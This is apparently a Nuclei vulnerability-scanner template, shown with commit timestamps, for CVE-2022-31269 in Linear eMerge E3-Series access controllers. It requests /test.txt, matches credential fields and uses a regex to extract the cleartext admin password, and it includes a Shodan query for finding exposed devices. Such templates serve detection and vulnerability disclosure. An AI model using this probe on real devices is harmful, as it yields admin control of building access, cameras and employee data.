2022-08-11 05:26:52 +00:00
id : CVE-2022-31269
info :
2023-02-03 16:34:12 +00:00
name : Linear eMerge E3-Series - Information Disclosure
2022-08-11 05:26:52 +00:00
author : For3stCo1d
severity : high
description : |
2023-02-03 16:34:12 +00:00
Linear eMerge E3-Series devices are susceptible to information disclosure. Admin credentials are stored in clear text at the endpoint /test.txt in situations where the default admin credentials have been changed. An attacker can obtain admin credentials, access the admin dashboard, control building access and cameras, and access employee information.
2022-08-11 05:26:52 +00:00
reference :
- https://packetstormsecurity.com/files/167990/Nortek-Linear-eMerge-E3-Series-Credential-Disclosure.html
2022-08-26 08:13:09 +00:00
- https://www.nortekcontrol.com/access-control/
2022-08-29 14:07:41 +00:00
- https://eg.linkedin.com/in/omar-1-hashem
2023-02-03 16:34:12 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-31269
2022-08-29 13:55:23 +00:00
classification :
2022-09-04 15:21:50 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
cvss-score : 8.2
2022-08-29 13:55:23 +00:00
cve-id : CVE-2022-31269
2022-09-04 15:21:50 +00:00
cwe-id : CWE-798
2023-07-11 19:49:27 +00:00
epss-score : 0.00357
cpe : cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:*
2022-08-11 05:26:52 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2022-08-11 05:26:52 +00:00
shodan-query : http.title:"Linear eMerge"
2023-06-04 08:13:42 +00:00
verified : true
2023-07-11 19:49:27 +00:00
vendor : nortekcontrol
product : emerge_e3_firmware
2022-08-27 04:41:18 +00:00
tags : cve2022,emerge,exposure,packetstorm,cve
2022-08-11 05:26:52 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-08-11 05:26:52 +00:00
- method : GET
path :
- "{{BaseURL}}/test.txt"
matchers-condition : and
matchers :
- type : word
words :
- "ID="
- "Password="
condition : and
- type : word
part : header
words :
- text/plain
- type : status
status :
- 200
extractors :
- type : regex
regex :
- Password='(.+?)'
